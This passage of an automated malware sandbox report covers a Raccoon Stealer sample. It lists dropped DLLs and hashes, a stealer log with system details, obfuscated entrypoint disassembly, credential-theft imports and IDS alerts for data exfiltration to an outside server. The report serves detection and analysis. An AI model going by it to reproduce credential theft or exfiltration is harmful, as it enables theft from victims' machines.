Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5 Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1081
Entropy (8bit):	5.293369180828438
Encrypted:	false
SSDEEP:	24:m9S+oCH/j3eLy53Net5IDTBqhKQa7MCGik/R8RA2Tvqzh:eSvCL3n3NetGBgxCGik/R0A+0h
MD5:	620E90F2E7CE4AE1B0FA7AB97B694A74
SHA1:	AB6929C63908E4AA9653D5E328D629BF5B41811D
SHA-256:	0276CBA3D1169907E2BA3F27895B24A0CB956425D2DBE16D16D691186615012F
SHA-512:	EC7B8A1889AF4D327C52FCC6A698ACC13031561322AD0C8F33950C5861C309EE0C8544763990EE7040953A79A2417AE2491FC9183FCC733BD226F934DDE51E33
Malicious:	false
Preview:	RACCOON STEALER \| 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 17:43:23 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: -8 hrs... - IP: 84.17.52.39... - Location: 47.431702, 8.575900 \| Zurich, Zurich, Switzerland (8152)... - ComputerName: 818225... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5391 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Updater (2.8.211.12)....Updat

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.874463936737332
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	eLZzxG56uH.exe
File size:	4704768
MD5:	82f7734fef8ee0789cf270f292651cbe
SHA1:	80db9b3c72f88b3cacb40362ee21baa2390de38c
SHA256:	9d8f04bd64b81ed3367def9f74a8a98e9a868f30db9433a9ef37b481394c9046
SHA512:	a493e4d5c3f6d617366fecdf981427544dfe083cd3859fb5b8972b9fc5aa9aa5ca33ddf45d7dfbe1c1887797228fc1b17a2f0a03ca59bc000b1931f02135263e
SSDEEP:	98304:62RwWMe+Sml+unSwywZ+741ksvzTciQoS9BTdrlv9z/8nltrM0C:S6+t3SpjsvzTJrSvz9Uf6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....7a.............................:2...........@...........................w...... H...@................................

File Icon


Icon Hash:	8c8cf0e8e8b34280

Static PE Info

General
Entrypoint:	0x723ab7
Entrypoint Section:	Intel Co
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61378D04 [Tue Sep 7 16:02:12 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	cd827b8586176b67403fab26f5e0d605

Entrypoint Preview

Instruction
push 73C66E3Eh
call 00007F1300FEC750h
ror edx, 1
test sp, 4851h
cmp si, 0FE8h
xor ebx, edx
cmp ah, FFFFFF96h
test si, dx
add esi, edx
jmp 00007F1301017EDFh
add esi, 00000004h
xor ecx, ebx
not ecx
rol ecx, 1
clc
lea ecx, dword ptr [ecx+298F47A7h]
neg ecx
jmp 00007F1300FDB25Fh
jmp 00007F13011147D2h
inc eax
cmp ah, 0000002Ch
xor ebx, eax
test edi, 6AA03DE9h
jmp 00007F130104BBB8h
movzx eax, byte ptr [ebp+00h]
lea ebp, dword ptr [ebp+00000001h]
xor al, bl
bsr edx, edi
inc dl
xor dh, FFFFFFBEh
xor al, 91h
ror dl, 00000032h
rol al, 1
sar dh, cl
btr dx, 0026h
add al, C9h
neg al
sal dh, cl
mov dx, sp
cmc
xor bl, al
push ebp
push edi
movsx ebp, bp
shrd bp, dx, 000000B0h
push ebx
mov ebp, esi
adc bx, si
ror ebx, 64h
mov ebx, eax
mov dl, 9Fh
and dl, al
xadd eax, eax
mov edx, ebx
cmp si, di
and al, 1Ah
shl edx, 02h
rcr eax, FFFFFFFCh
bsr eax, edi
mov eax, ebp
stc
lea eax, dword ptr [eax+edx]
mov dword ptr [ebp-04h], eax
test ebx, ebx
jmp 00007F1301023C97h
cmp sp, 43C5h
xor eax, ebx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c0fc8	0x17c	Intel Co
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x737000	0x41f2b	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x736000	0x5ec	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x735a10	0x40	Intel Co
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48a000	0x5bc	Intel Co
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6b143	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x6d000	0x19b42	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x87000	0x5498	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Intel Co	0x8d000	0xef0	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Intel Co	0x8e000	0x26de14	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Intel Co	0x2fc000	0x439e50	0x43a000	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x736000	0x5ec	0x600	False	0.520182291667	data	4.23599407768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x737000	0x41f2b	0x42000	False	0.295691287879	data	5.53624937096	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
MUI	0x737464	0x118	data
TYPELIB	0x73757c	0x6d6c	data
TYPELIB	0x73e2e8	0x6d6c	data
TYPELIB	0x745054	0x6d6c	data	Sanskrit	India
TYPELIB	0x74bdc0	0xc44	data
RT_ICON	0x74ca04	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 1476365312
RT_ICON	0x74daac	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x74df14	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 3019734784, next used block 2667479040
RT_ICON	0x7504bc	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 1090355712, next used block 150963456
RT_ICON	0x7546e4	0x10828	data
RT_ICON	0x764f0c	0x8b7f	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x76da8c	0x5a	data
RT_VERSION	0x76dae8	0x1b4	data
RT_VERSION	0x76dc9c	0x1b4	data
RT_VERSION	0x76de50	0x1b4	data	Sanskrit	India
RT_HTML	0x76e004	0x2e7e	HTML document, ASCII text, with very long lines, with CRLF line terminators
RT_HTML	0x770e84	0x33b5	HTML document, ASCII text, with very long lines, with CRLF line terminators
RT_HTML	0x77423c	0x33b7	HTML document, ASCII text, with very long lines, with CRLF line terminators
RT_MANIFEST	0x7775f4	0xc9b	XML 1.0 document, UTF-8 Unicode (with BOM) text
RT_MANIFEST	0x778290	0xc9b	XML 1.0 document, UTF-8 Unicode (with BOM) text	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, GetModuleHandleA, GetLocaleInfoA, Sleep, RemoveDirectoryTransactedA, GetUserDefaultLCID, CreateThread, GetLastError, DeleteFileA, HeapAlloc, lstrcpynA, lstrcmpiW, GetModuleFileNameA, GetCurrentProcess, GetSystemPowerStatus, CreateMutexA, OpenProcess, CreateToolhelp32Snapshot, MultiByteToWideChar, GetSystemWow64DirectoryW, GetTimeZoneInformation, OpenMutexA, Process32NextW, GlobalAlloc, GetEnvironmentVariableA, Process32FirstW, GlobalFree, GetSystemInfo, GetLogicalDriveStringsA, GlobalMemoryStatusEx, WideCharToMultiByte, CreateProcessA, GetComputerNameA, UnmapViewOfFile, GetFileInformationByHandle, CloseHandle, GetLocalTime, CreateFileMappingA, MapViewOfFile, GetTickCount, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, HeapReAlloc, OutputDebugStringW, lstrlenA, GetFileSize, lstrcpyW, lstrcatW, GetVersionExW, lstrlenW, CreateDirectoryA, lstrcpyA, SystemTimeToFileTime, CreateFileA, GetFileAttributesA, LocalFileTimeToFileTime, SetCurrentDirectoryA, GetCurrentDirectoryA, SetFilePointer, SetFileTime, WriteFile, ReadFile, FindClose, GetDriveTypeA, CopyFileTransactedA, FreeLibrary, GetProcessHeap, LocalFree, GetProcAddress, LoadLibraryA, LocalAlloc, DeleteFileTransactedA, SetEnvironmentVariableW, ReadConsoleW, EnumSystemLocalesW, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileSizeEx, HeapSize, GetCommandLineW, GetCommandLineA, WriteConsoleW, GetModuleFileNameW, GetFileType, GetStdHandle, GetModuleHandleExW, HeapFree, FileTimeToSystemTime, CreateDirectoryTransactedA, ExitProcess, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetLastError, RaiseException, RtlUnwind, TerminateProcess, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, GetModuleHandleW, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, GetCPInfo, SetCurrentDirectoryW, CreateDirectoryW, CreateFileW, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, SetEndOfFile, SetFilePointerEx, AreFileApisANSI, DeviceIoControl, CopyFileW, CreateHardLinkW, GetFileInformationByHandleEx, CreateSymbolicLinkW, FormatMessageA, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW
USER32.dll	wsprintfW, wsprintfA, GetWindowRect, GetSystemMetrics, GetWindowDC, EnumDisplayDevicesA, GetDesktopWindow
GDI32.dll	BitBlt, SaveDC, SelectObject, CreateDIBSection, CreateCompatibleDC, GetDeviceCaps, DeleteDC, RestoreDC, DeleteObject
ADVAPI32.dll	GetTokenInformation, CryptGetHashParam, CryptDestroyHash, RegQueryValueExA, GetUserNameA, CreateProcessWithTokenW, OpenProcessToken, RegOpenKeyExA, ConvertSidToStringSidW, DuplicateTokenEx, RegQueryValueExW, CryptReleaseContext, RegCloseKey, RegEnumKeyExW, RegOpenKeyExW, CryptAcquireContextA, CredEnumerateW, CredFree, CryptCreateHash, CryptHashData
SHELL32.dll	SHGetFolderPathA, ShellExecuteA, SHGetSpecialFolderPathW
ole32.dll	CoInitialize, CoUninitialize, CoTaskMemFree, CoCreateInstance
USERENV.dll	GetUserProfileDirectoryA
ktmw32.dll	CreateTransaction, RollbackTransaction, CommitTransaction
bcrypt.dll	BCryptDecrypt, BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptCloseAlgorithmProvider, BCryptSetProperty
CRYPT32.dll	CryptStringToBinaryA, CryptUnprotectData
SHLWAPI.dll	StrCmpNW, StrToIntA, StrStrIW
WINHTTP.dll	WinHttpSendRequest, WinHttpConnect, WinHttpQueryDataAvailable, WinHttpOpenRequest, WinHttpCloseHandle, WinHttpOpen, WinHttpSetOption, WinHttpReceiveResponse, WinHttpReadData
gdiplus.dll	GdiplusStartup, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCreateBitmapFromHBITMAP, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusShutdown, GdipSaveImageToFile
WTSAPI32.dll	WTSSendMessageW
KERNEL32.dll	VirtualQuery, GetSystemTimeAsFileTime, GetModuleHandleA, CreateEventA, GetModuleFileNameW, LoadLibraryA, TerminateProcess, GetCurrentProcess, CreateToolhelp32Snapshot, Thread32First, GetCurrentProcessId, GetCurrentThreadId, OpenThread, Thread32Next, CloseHandle, SuspendThread, ResumeThread, WriteProcessMemory, GetSystemInfo, VirtualAlloc, VirtualProtect, VirtualFree, GetProcessAffinityMask, SetProcessAffinityMask, GetCurrentThread, SetThreadAffinityMask, Sleep, FreeLibrary, GetTickCount, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFree, LocalAlloc, LocalFree, GetProcAddress, ExitProcess, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetModuleHandleW, LoadResource, MultiByteToWideChar, FindResourceExW, FindResourceExA, WideCharToMultiByte, GetThreadLocale, GetUserDefaultLCID, GetSystemDefaultLCID, EnumResourceNamesA, EnumResourceNamesW, EnumResourceLanguagesA, EnumResourceLanguagesW, EnumResourceTypesA, EnumResourceTypesW, CreateFileW, LoadLibraryW, GetLastError, FlushFileBuffers, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, GetCommandLineA, RaiseException, RtlUnwind, HeapFree, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LCMapStringA, LCMapStringW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, HeapReAlloc, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteFile, SetFilePointer, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, SetStdHandle
USER32.dll	GetProcessWindowStation, GetUserObjectInformationW, CharUpperBuffW, MessageBoxW
KERNEL32.dll	LocalAlloc, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
USER32.dll	GetProcessWindowStation, GetUserObjectInformationW

Version Infos

Description	Data
InternalName	sojbmoemonu.uhe
ProductVersion	8.19.590.38
Copyright	Copyrighz (C) 2021, fudkagata
Translation	0x0129 0x0167

Possible Origin

Language of compilation system	Country where language is spoken	Map
Sanskrit	India
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-08:53:40.198459	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49744	80	192.168.2.3	185.138.164.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:53:33.669140100 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:33.669181108 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:33.669294119 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:33.674021959 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:33.674053907 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:33.740139961 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:33.740329027 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:33.743253946 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:33.743280888 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:33.743496895 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:33.798211098 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.089068890 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.126095057 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.126131058 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.126157999 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.126239061 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.126240969 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.126310110 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.128169060 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.128210068 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.128257036 CEST	49743	443	192.168.2.3	149.154.167.99
Sep 28, 2021 08:53:34.128268957 CEST	443	49743	149.154.167.99	192.168.2.3
Sep 28, 2021 08:53:34.136909962 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.171899080 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.172063112 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.173084974 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.173703909 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.210274935 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.210397959 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697535992 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697567940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697581053 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697597027 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697613955 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697626114 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.697910070 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.710309982 CEST	49744	80	192.168.2.3	185.138.164.150
Sep 28, 2021 08:53:34.745379925 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.961823940 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.961869001 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.961894989 CEST	80	49744	185.138.164.150	192.168.2.3
Sep 28, 2021 08:53:34.961910963 CEST	80	49744	185.138.164.150	192.168.2.3
